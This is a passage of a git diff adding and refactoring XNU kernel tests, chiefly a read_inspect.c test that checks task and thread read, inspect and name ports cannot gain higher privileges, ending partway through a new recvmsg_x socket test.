TEST_TSP(THREAD_READ_PORT); + TEST_TSP(THREAD_INSPECT_PORT); + +#undef TEST_TSP + + T_EXPECT_EQ(THREAD_READ_PORT, THREAD_MAX_SPECIAL_PORT, + "checked all of the ports"); + + const char *invalid_tsp = + mach_thread_special_port_description(THREAD_MAX_SPECIAL_PORT + 1); + T_EXPECT_NULL(invalid_tsp, + "invalid thread special port description should be NULL"); +} + static void expect_special_port_id(int (*fn)(const char *id), int port, const 
char *portid) { @@ -172,6 +197,8 @@ T_DECL(task_special_port_mapping, portdef, #portdef) TEST_TSP(TASK_KERNEL_PORT); + TEST_TSP(TASK_READ_PORT); + TEST_TSP(TASK_INSPECT_PORT); TEST_TSP(TASK_HOST_PORT); TEST_TSP(TASK_NAME_PORT); TEST_TSP(TASK_BOOTSTRAP_PORT); @@ -186,3 +213,21 @@ T_DECL(task_special_port_mapping, T_EXPECT_EQ(invalid_tsp, -1, "invalid task special port IDs should return -1"); } + +T_DECL(thread_special_port_mapping, + "verify that thread special port names can be mapped to numbers") +{ +#define TEST_TSP(portdef) \ + expect_special_port_id(mach_thread_special_port_for_id, \ + portdef, #portdef) + + TEST_TSP(THREAD_KERNEL_PORT); + TEST_TSP(THREAD_READ_PORT); + TEST_TSP(THREAD_INSPECT_PORT); + +#undef TEST_TSP + + int invalid_tsp = mach_thread_special_port_for_id("BOGUS_SPECIAL_PORT_NAME"); + T_EXPECT_EQ(invalid_tsp, -1, + "invalid thread special port IDs should return -1"); +} diff --git a/tests/preoslog.c b/tests/preoslog.c index e8615016c..9b1b26141 100644 --- a/tests/preoslog.c +++ b/tests/preoslog.c @@ -4,6 +4,8 @@ #include #include +#include "test_utils.h" + /* * Any change to this structure must be reflected in iBoot / MacEFI / PanicDump / XNU Tests and vice versa. */ @@ -39,21 +41,6 @@ check_for_substrings(const char* string, size_t len) return res; } -static boolean_t -is_development_kernel(void) -{ - int ret; - int dev = 0; - size_t dev_size = sizeof(dev); - - ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0); - if (ret != 0) { - return FALSE; - } - - return dev != 0; -} - /* * Valid cases: * 1. Development & Debug iBoot/macEFI provides a preoslog buffer. 
diff --git a/tests/quiesce_counter.c b/tests/quiesce_counter.c index d864d8531..18f54d76d 100644 --- a/tests/quiesce_counter.c +++ b/tests/quiesce_counter.c @@ -68,9 +68,9 @@ T_DECL(test_quiescent_counter, "Validate that _COMM_PAGE_CPU_QUIESCENT_COUNTER i T_ASSERT_GT(cpu_checkin_min_interval, 0, "kern.cpu_checkin_interval should be > 0"); - uint64_t* commpage_addr = (uint64_t *)(uintptr_t)_COMM_PAGE_CPU_QUIESCENT_COUNTER; + COMM_PAGE_SLOT_TYPE(uint64_t) commpage_addr = COMM_PAGE_SLOT(uint64_t, CPU_QUIESCENT_COUNTER); - T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", (void*) commpage_addr); + T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", commpage_addr); uint64_t counter = *commpage_addr; uint64_t last_counter = counter; diff --git a/tests/read_inspect.c b/tests/read_inspect.c new file mode 100644 index 000000000..82b375125 --- /dev/null +++ b/tests/read_inspect.c @@ -0,0 +1,630 @@ +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IKOT_THREAD_CONTROL 1 +#define IKOT_THREAD_READ 47 +#define IKOT_THREAD_INSPECT 46 + +#define IKOT_TASK_CONTROL 2 +#define IKOT_TASK_READ 45 +#define IKOT_TASK_INSPECT 44 +#define IKOT_TASK_NAME 20 + + +/* + * This test verifies various security properties for task and thread + * read/inspect interfaces. Specifically, it checks and makes sure: + * + * 1. Task/thread can't get higher priv'ed ports from lower ones through + * {task, thread}_get_special_port() + * 2. Correct level of thread ports are returned from task_threads() with + * a given task port flavor + * 3. Correct level of task ports are returned from processor_set_tasks() + * 4. MIG intrans conversion and enforcement for task/thread port does not break. + * 5. task_{, read, inspect, name}_for_pid() works for self and other process + * 6. 
The new mach_vm_remap_new interface behaves correctly + */ + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE));
+
+/*
+ * Record an expectation about a call made through a port of a given flavor.
+ *
+ * kr        result of the call under test
+ * flavor    flavor of the port the call was made with
+ *           (task_flavor_t or thread_flavor_t)
+ * required  flavor value the call is expected to need
+ * f_name    name of the call, used only in the log message
+ *
+ * The call is expected to succeed when flavor <= required (the comparison
+ * treats numerically smaller flavor values as at least as capable) and to
+ * fail otherwise. Uses T_EXPECT_*, so a mismatch is recorded and the test
+ * keeps running.
+ */
+static void
+RESULT_CHECK(
+	kern_return_t kr,
+	unsigned int flavor, /* task_flavor_t or thread_flavor_t */
+	unsigned int required, /* task_flavor_t or thread_flavor_t */
+	const char *f_name) /* callers pass string literals */
+{
+	if (flavor > required) {
+		T_EXPECT_NE(kr, KERN_SUCCESS, "%s should fail with task/thread flavor %u, kr: 0x%x", f_name, flavor, kr);
+		return;
+	}
+	T_EXPECT_EQ(kr, KERN_SUCCESS, "%s should succeed with task/thread flavor %u, kr: 0x%x", f_name, flavor, kr);
+}
+
+static void +test_task_get_special_port( + task_t tport, + task_flavor_t flavor) +{ + kern_return_t kr; + mach_port_t special_port = MACH_PORT_NULL; + mach_port_t tfp_port = MACH_PORT_NULL; + + T_LOG("Testing task_get_special_port() with task flavor %d", flavor); + /* gettable with at least control port */ + kr = task_get_special_port(tport, TASK_KERNEL_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_KERNEL_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + kr = task_get_special_port(tport, TASK_BOOTSTRAP_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_BOOTSTRAP_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + kr = task_get_special_port(tport, TASK_HOST_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_HOST_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least read port */ + kr = task_get_special_port(tport, TASK_READ_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_special_port(TASK_READ_PORT)"); + if (KERN_SUCCESS == kr) { + kr = task_read_for_pid(mach_task_self(), getpid(), &tfp_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, 
"task_read_for_pid()"); + T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_read_for_pid() should match TASK_READ_PORT"); + mach_port_deallocate(mach_task_self(), tfp_port); + } + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least inspect port */ + kr = task_get_special_port(tport, TASK_INSPECT_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_INSPECT_PORT)"); + if (KERN_SUCCESS == kr) { + kr = task_inspect_for_pid(mach_task_self(), getpid(), &tfp_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()"); + T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_inspect_for_pid() should match TASK_INSPECT_PORT"); + mach_port_deallocate(mach_task_self(), tfp_port); + } + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least name port */ + kr = task_get_special_port(tport, TASK_NAME_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_NAME_PORT)"); + if (KERN_SUCCESS == kr) { + kr = task_name_for_pid(mach_task_self(), getpid(), &tfp_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()"); + T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_name_for_pid() should match TASK_NAME_PORT"); + mach_port_deallocate(mach_task_self(), tfp_port); + } + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; +} + +static void +test_thread_get_special_port( + thread_t tport, + thread_flavor_t flavor) +{ + kern_return_t kr; + mach_port_t special_port = MACH_PORT_NULL; + + T_LOG("Testing thread_get_special_port() with thread flavor %d", flavor); + /* gettable with at least control port */ + kr = thread_get_special_port(tport, THREAD_KERNEL_PORT, &special_port); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_special_port(THREAD_KERNEL_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + 
special_port = MACH_PORT_NULL; + + /* gettable with at least read port */ + kr = thread_get_special_port(tport, THREAD_READ_PORT, &special_port); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_special_port(THREAD_READ_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least inspect port */ + kr = thread_get_special_port(tport, THREAD_INSPECT_PORT, &special_port); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_special_port(THREAD_INSPECT_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; +}
+
+/*
+ * Check that task_threads() hands back thread ports whose kernel object type
+ * matches the flavor of the task port it was called with.
+ *
+ * tport   task port to query
+ * flavor  flavor of tport; task_threads() is expected to succeed for
+ *         flavors up to and including TASK_FLAVOR_INSPECT
+ *
+ * When task_threads() itself fails the rest of the check is skipped.
+ */
+static void
+test_task_threads(
+	task_t tport,
+	task_flavor_t flavor)
+{
+	kern_return_t kr;
+	thread_array_t threadList = NULL;
+	mach_msg_type_number_t threadCount = 0;
+
+	unsigned int kotype = 0;
+	unsigned int kaddr = 0;
+
+	T_LOG("Testing task_threads() with task flavor %d", flavor);
+
+	kr = task_threads(tport, &threadList, &threadCount);
+	RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_threads");
+
+	if (kr) {
+		T_LOG("task_threads failed, skipping test_task_threads()");
+		return;
+	}
+
+	T_QUIET; T_ASSERT_GE(threadCount, 1, "threadCount should be at least 1");
+
+	/*
+	 * TASK_FLAVOR_CONTROL -> THREAD_FLAVOR_CONTROL
+	 * TASK_FLAVOR_READ    -> THREAD_FLAVOR_READ
+	 * TASK_FLAVOR_INSPECT -> THREAD_FLAVOR_INSPECT
+	 * TASK_FLAVOR_NAME    -> KERN_FAILURE
+	 */
+	for (size_t i = 0; i < threadCount; i++) {
+		kr = mach_port_kernel_object(mach_task_self(), threadList[i], &kotype, &kaddr);
+		if (kr == KERN_INVALID_RIGHT) {
+			/* thread port is inactive */
+			T_LOG("thread port name 0x%x is inactive", threadList[i]);
+			continue;
+		} else if (kr) {
+			T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr);
+			/* T_FAIL does not stop the test; kotype is not valid for this port */
+			continue;
+		}
+		switch (flavor) {
+		case TASK_FLAVOR_CONTROL:
+			T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_CONTROL, "Task control port should yield thread control port");
+			break;
+		case TASK_FLAVOR_READ:
+			T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_READ, "Task read port should yield thread read port");
+			break;
+		case TASK_FLAVOR_INSPECT:
+			T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_INSPECT, "Task inspect port should yield thread inspect port");
+			break;
+		default:
+			T_FAIL("task_threads() returned thread ports with task name port??");
+			break;
+		}
+	}
+
+	/* Drop every returned right, including the ones skipped above. */
+	for (size_t i = 0; i < threadCount; i++) {
+		mach_port_deallocate(mach_task_self(), threadList[i]);
+	}
+
+	/* The port name array is returned out-of-line; release it as well. */
+	(void)mach_vm_deallocate(mach_task_self(),
+	    (mach_vm_address_t)(uintptr_t)threadList,
+	    (mach_vm_size_t)threadCount * sizeof(threadList[0]));
+}
+
+static void +test_processor_set_tasks( + task_flavor_t flavor) +{ + kern_return_t kr; + processor_set_name_array_t psets; + processor_set_t pset_priv; + task_array_t taskList; + mach_msg_type_number_t pcnt = 0, tcnt = 0; + mach_port_t host = mach_host_self(); + + unsigned int kotype; + unsigned int kaddr; + + T_LOG("Testing processor_set_tasks() with task flavor %d", flavor); + + kr = host_processor_sets(host, &psets, &pcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets"); + T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set"); + + kr = host_processor_set_priv(host, psets[0], &pset_priv); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv"); + for (size_t i = 0; i < pcnt; i++) { + mach_port_deallocate(mach_task_self(), psets[i]); + } + mach_port_deallocate(mach_task_self(), host); + + kr = processor_set_tasks_with_flavor(pset_priv, flavor, &taskList, &tcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor"); + T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task"); + mach_port_deallocate(mach_task_self(), pset_priv); + + for (size_t i = 0; i < tcnt; i++) { + kr = mach_port_kernel_object(mach_task_self(), taskList[i], &kotype, &kaddr); + if (kr == KERN_INVALID_RIGHT) { + /* task port is inactive */ + T_LOG("task port name 0x%x is inactive", taskList[i]); + continue; + } else if (kr) { + T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr); + } + switch (flavor) { + case TASK_FLAVOR_CONTROL: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_CONTROL, "TASK_FLAVOR_CONTROL should yield control 
ports"); + break; + case TASK_FLAVOR_READ: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_READ, "TASK_FLAVOR_READ should yield read ports"); + break; + case TASK_FLAVOR_INSPECT: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_INSPECT, "TASK_FLAVOR_INSPECT should yield inspect ports"); + break; + case TASK_FLAVOR_NAME: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_NAME, "TASK_FLAVOR_NAME should yield name ports"); + break; + default: + T_FAIL("strange flavor"); + break; + } + } + + for (size_t i = 0; i < tcnt; i++) { + mach_port_deallocate(mach_task_self(), taskList[i]); + } +} + +static void +test_task_port_mig_intrans( + task_t tport, + task_flavor_t flavor) +{ + kern_return_t kr; + + T_LOG("Testing various MIG/manual intrans task interfaces with task flavor %d", flavor); + + { + /* 1. Test some control port interfaces */ + int data = 0x41; + int new_value = 0x42; + kr = mach_vm_write(tport, + (mach_vm_address_t)&data, + (vm_offset_t)&new_value, + (mach_msg_type_number_t)sizeof(int)); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_write"); + + /* mach_vm_remap_new with max_protection VM_PROT_WRITE | VM_PROT_READ */ + int *localAddress = 0; + mach_vm_address_t localMachVMAddress = 0; + vm_prot_t cur_protection = VM_PROT_WRITE | VM_PROT_READ; + vm_prot_t max_protection = VM_PROT_WRITE | VM_PROT_READ; + /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */ + kr = mach_vm_remap_new(mach_task_self(), + &localMachVMAddress, + sizeof(int), + 0, + VM_FLAGS_ANYWHERE, + tport, /* remote task, use self task port */ + (mach_vm_address_t)&data, + false, + &cur_protection, + &max_protection, + VM_INHERIT_NONE); + localAddress = (int *)(uintptr_t)localMachVMAddress; + + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_remap_new - VM_PROT_WRITE"); + if (KERN_SUCCESS == kr) { + T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + T_QUIET; 
T_EXPECT_EQ(*localAddress, data, NULL); /* read */ + *localAddress = 0; /* write */ + } + + exception_mask_t masks[EXC_TYPES_COUNT] = {}; + mach_msg_type_number_t nmasks = 0; + exception_port_t ports[EXC_TYPES_COUNT] = {}; + exception_behavior_t behaviors[EXC_TYPES_COUNT] = {}; + thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {}; + kr = task_get_exception_ports(tport, EXC_MASK_ALL, + masks, &nmasks, ports, behaviors, flavors); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_exception_ports"); + for (size_t i = 0; i < EXC_TYPES_COUNT; i++) { + mach_port_deallocate(mach_task_self(), ports[i]); + } + } + + { + /* 2. Test some read port interfaces */ + vm_offset_t read_value = 0; + mach_msg_type_number_t read_cnt = 0; + int data = 0x41; + kr = mach_vm_read(tport, + (mach_vm_address_t)&data, + (mach_msg_type_number_t)sizeof(int), + &read_value, + &read_cnt); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_read"); + + /* mach_vm_remap_new with max_protection VM_PROT_READ */ + int *localAddress = 0; + mach_vm_address_t localMachVMAddress = 0; + vm_prot_t cur_protection = VM_PROT_READ; + vm_prot_t max_protection = VM_PROT_READ; + /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */ + kr = mach_vm_remap_new(mach_task_self(), + &localMachVMAddress, + sizeof(int), + 0, + VM_FLAGS_ANYWHERE, + tport, /* remote task, use self task port */ + (mach_vm_address_t)&data, + false, + &cur_protection, + &max_protection, + VM_INHERIT_NONE); + localAddress = (int *)(uintptr_t)localMachVMAddress; + + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - VM_PROT_READ"); + if (KERN_SUCCESS == kr) { + T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ, NULL); + T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ, NULL); + T_QUIET; T_EXPECT_EQ(*localAddress, data, NULL); /* read */ + } + + /* mach_vm_remap_new with copy == TRUE */ + int data2 = 0x42; + localAddress = 0; + localMachVMAddress = 0; + cur_protection = 
VM_PROT_WRITE | VM_PROT_READ; + max_protection = VM_PROT_WRITE | VM_PROT_READ; + + kr = mach_vm_remap_new(mach_task_self(), + &localMachVMAddress, + sizeof(int), + 0, + VM_FLAGS_ANYWHERE, + tport, /* remote task, use self task port */ + (mach_vm_address_t)&data2, + true, + &cur_protection, + &max_protection, + VM_INHERIT_NONE); + localAddress = (int *)(uintptr_t)localMachVMAddress; + + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - copy==TRUE"); + if (KERN_SUCCESS == kr) { + T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + /* Following is causing bus error tracked by rdar://71616700 (Unexpected BUS ERROR in mach_vm_remap_new()) */ + // T_QUIET; T_EXPECT_EQ(*localAddress, data2, NULL); /* read */ + // *localAddress = 0; /* write */ + } + + /* */ + mach_port_t voucher = MACH_PORT_NULL; + kr = task_get_mach_voucher(tport, 0, &voucher); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_mach_voucher"); + mach_port_deallocate(mach_task_self(), voucher); + + /* */ + ipc_info_space_t space_info; + ipc_info_name_array_t table; + mach_msg_type_number_t tableCount; + ipc_info_tree_name_array_t tree; /* unused */ + mach_msg_type_number_t treeCount; /* unused */ + kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_port_space_info"); + } + + { + /* 3. Test some inspect port interfaces */ + task_exc_guard_behavior_t exc_behavior; + kr = task_get_exc_guard_behavior(tport, &exc_behavior); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_exc_guard_behavior"); + } + + { + /* 4. 
Test some name port interfaces */ + struct task_basic_info info; + mach_msg_type_number_t size = sizeof(info); + kr = task_info(tport, + TASK_BASIC_INFO, + (task_info_t)&info, + &size); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_NAME, "task_info"); + } +} + +static void +test_thread_port_mig_intrans( + thread_t tport, + thread_flavor_t flavor) +{ + kern_return_t kr; + + T_LOG("Testing various MIG/manual intrans thread interfaces with thread flavor %d", flavor); + + { + /* 1. Test some control port interfaces */ + exception_mask_t masks[EXC_TYPES_COUNT] = {}; + mach_msg_type_number_t nmasks = 0; + exception_port_t ports[EXC_TYPES_COUNT] = {}; + exception_behavior_t behaviors[EXC_TYPES_COUNT] = {};; + thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {};; + kr = thread_get_exception_ports(tport, EXC_MASK_ALL, + masks, &nmasks, ports, behaviors, flavors); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_exception_ports"); + for (size_t i = 0; i < EXC_TYPES_COUNT; i++) { + mach_port_deallocate(mach_task_self(), ports[i]); + } + } + + { + /* 2. Test some read port interfaces */ + mach_voucher_t voucher = MACH_PORT_NULL; + kr = thread_get_mach_voucher(tport, 0, &voucher); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_mach_voucher"); + mach_port_deallocate(mach_task_self(), voucher); + } + + { + /* 3. 
Test some inspect port interfaces */ + processor_set_name_t name = MACH_PORT_NULL; + kr = thread_get_assignment(tport, &name); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_assignment"); + mach_port_deallocate(mach_task_self(), name); + } +}
+
+/*
+ * Fork a child that idles in a sleep loop, check that the control, read,
+ * inspect and name task ports can all be obtained for its pid, then kill and
+ * reap the child.
+ *
+ * The port lookups use T_EXPECT_*, so a failed lookup is recorded and the
+ * remaining lookups still run.
+ */
+static void
+test_get_child_task_port(void)
+{
+	pid_t child_pid;
+	kern_return_t kr;
+	/* Start from MACH_PORT_NULL so a failed lookup never leaves garbage to deallocate. */
+	mach_port_name_t tr = MACH_PORT_NULL;
+	mach_port_name_t ti = MACH_PORT_NULL;
+	mach_port_name_t tp = MACH_PORT_NULL;
+	mach_port_name_t tn = MACH_PORT_NULL;
+	int status;
+
+	/* Log before forking so the message is emitted once, by the parent only. */
+	T_LOG("Testing get child task ports");
+
+	child_pid = fork();
+
+	if (child_pid < 0) {
+		T_FAIL("fork failed in test_get_child_port.");
+		/*
+		 * T_FAIL does not stop the test. Bail out here: continuing would
+		 * reach kill(-1, SIGKILL), which signals every process this test
+		 * is permitted to signal.
+		 */
+		return;
+	}
+
+	if (child_pid == 0) {
+		/* hang the child */
+		while (1) {
+			sleep(10);
+		}
+	}
+
+	kr = task_for_pid(mach_task_self(), child_pid, &tp);
+	T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid);
+
+	kr = task_read_for_pid(mach_task_self(), child_pid, &tr);
+	T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid);
+
+	kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti);
+	T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid);
+
+	kr = task_name_for_pid(mach_task_self(), child_pid, &tn);
+	T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid);
+
+	mach_port_deallocate(mach_task_self(), tp);
+	mach_port_deallocate(mach_task_self(), tr);
+	mach_port_deallocate(mach_task_self(), ti);
+	mach_port_deallocate(mach_task_self(), tn);
+
+	kill(child_pid, SIGKILL);
+	/* Reap this specific child rather than whichever child exits first. */
+	waitpid(child_pid, &status, 0);
+}
+
+T_DECL(read_inspect, "Test critical read and inspect port interfaces") +{ + mach_port_t control_port, movable_port, read_port, inspect_port, name_port; + mach_port_t th_control_port, th_movable_port, th_read_port, th_inspect_port; +#define TASK_PORT_COUNT 5 +#define THREAD_PORT_COUNT 4 + mach_port_t task_ports[TASK_PORT_COUNT]; + task_flavor_t task_flavors[TASK_PORT_COUNT]; + mach_port_t thread_ports[THREAD_PORT_COUNT]; + thread_flavor_t thread_flavors[THREAD_PORT_COUNT]; + kern_return_t kr; + + /* first, try getting all flavors of task port for self */ 
+ kr = task_for_pid(mach_task_self(), getpid(), &control_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()"); + task_ports[0] = control_port; + task_flavors[0] = TASK_FLAVOR_CONTROL; + + kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &movable_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port(..TASK_KERNEL_PORT..)"); + task_ports[1] = movable_port; + task_flavors[1] = TASK_FLAVOR_CONTROL; + + kr = task_read_for_pid(mach_task_self(), getpid(), &read_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_read_for_pid()"); + task_ports[2] = read_port; + task_flavors[2] = TASK_FLAVOR_READ; + + kr = task_inspect_for_pid(mach_task_self(), getpid(), &inspect_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()"); + task_ports[3] = inspect_port; + task_flavors[3] = TASK_FLAVOR_INSPECT; + + kr = task_name_for_pid(mach_task_self(), getpid(), &name_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()"); + task_ports[4] = name_port; + task_flavors[4] = TASK_FLAVOR_NAME; + + + for (size_t i = 0; i < TASK_PORT_COUNT; i++) { + /* + * 1. Make sure can't get higher priv'ed ports from lower ones through + * task_get_special_port() + */ + test_task_get_special_port(task_ports[i], task_flavors[i]); + + /* + * 2. Make sure correct level of thread ports are returned from task_threads + */ + test_task_threads(task_ports[i], task_flavors[i]); + + /* + * 3. Make sure correct level of task ports are returned from processor_set_tasks + */ + if (i >= 1) { + test_processor_set_tasks(task_flavors[i]); + } + + /* + * 4. Make sure our MIG intrans enforcement for tasks does not break. + */ + test_task_port_mig_intrans(task_ports[i], task_flavors[i]); + } + + + for (size_t i = 0; i < TASK_PORT_COUNT; i++) { + mach_port_deallocate(mach_task_self(), task_ports[i]); + } + + /* 4. 
Try spawning a child an get its task ports */ + test_get_child_task_port(); + + /* Now, test thread read/inspect ports */ + th_control_port = mach_thread_self(); + thread_ports[0] = th_control_port; + thread_flavors[0] = THREAD_FLAVOR_CONTROL; + + kr = thread_get_special_port(th_control_port, THREAD_KERNEL_PORT, &th_movable_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_KERNEL_PORT..)"); + thread_ports[1] = th_movable_port; + thread_flavors[1] = THREAD_FLAVOR_CONTROL; + + kr = thread_get_special_port(th_control_port, THREAD_READ_PORT, &th_read_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_READ_PORT..)"); + thread_ports[2] = th_read_port; + thread_flavors[2] = THREAD_FLAVOR_READ; + + kr = thread_get_special_port(th_control_port, THREAD_INSPECT_PORT, &th_inspect_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_INSPECT_PORT..)"); + thread_ports[3] = th_inspect_port; + thread_flavors[3] = THREAD_FLAVOR_INSPECT; + + + for (size_t i = 0; i < THREAD_PORT_COUNT; i++) { + /* + * 1. Make sure can't get higher priv'ed ports from lower ones through + * thread_get_special_port() + */ + test_thread_get_special_port(thread_ports[i], thread_flavors[i]); + + /* + * 2. Make sure our MIG intrans enforcement for threads does not break. + */ + test_thread_port_mig_intrans(thread_ports[i], thread_flavors[i]); + } + + for (size_t i = 0; i < THREAD_PORT_COUNT; i++) { + mach_port_deallocate(mach_task_self(), thread_ports[i]); + } +} diff --git a/tests/recvmsg_x_test.c b/tests/recvmsg_x_test.c new file mode 100644 index 000000000..fb86f46cd --- /dev/null +++ b/tests/recvmsg_x_test.c @@ -0,0 +1,216 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). 
You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +/* -*- compile-command: "xcrun --sdk iphoneos.internal make recvmsg_x_test" -*- */ + + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#define NMSGS 5 +#define BUFFERLEN 1000 + +T_GLOBAL_META(T_META_NAMESPACE("xnu.net")); + +static void +sendPackets(int s, struct sockaddr *dst, unsigned int numMsg, size_t bufferLen) +{ + ssize_t count = 0; + struct msghdr msg = {}; + struct iovec vec = {}; + char *bytes = calloc(1, bufferLen); + if (bytes == NULL) { + err(EX_OSERR, "calloc()"); + } + + vec.iov_base = bytes; + vec.iov_len = bufferLen; + + msg.msg_name = (void *)dst; + msg.msg_namelen = dst->sa_len; + msg.msg_iov = &vec; + msg.msg_iovlen = 1; + msg.msg_flags = 0; + + for (unsigned int i = 0; i < numMsg; i++) { + ssize_t n; + T_QUIET; T_EXPECT_POSIX_SUCCESS(n = sendmsg(s, &msg, 0), 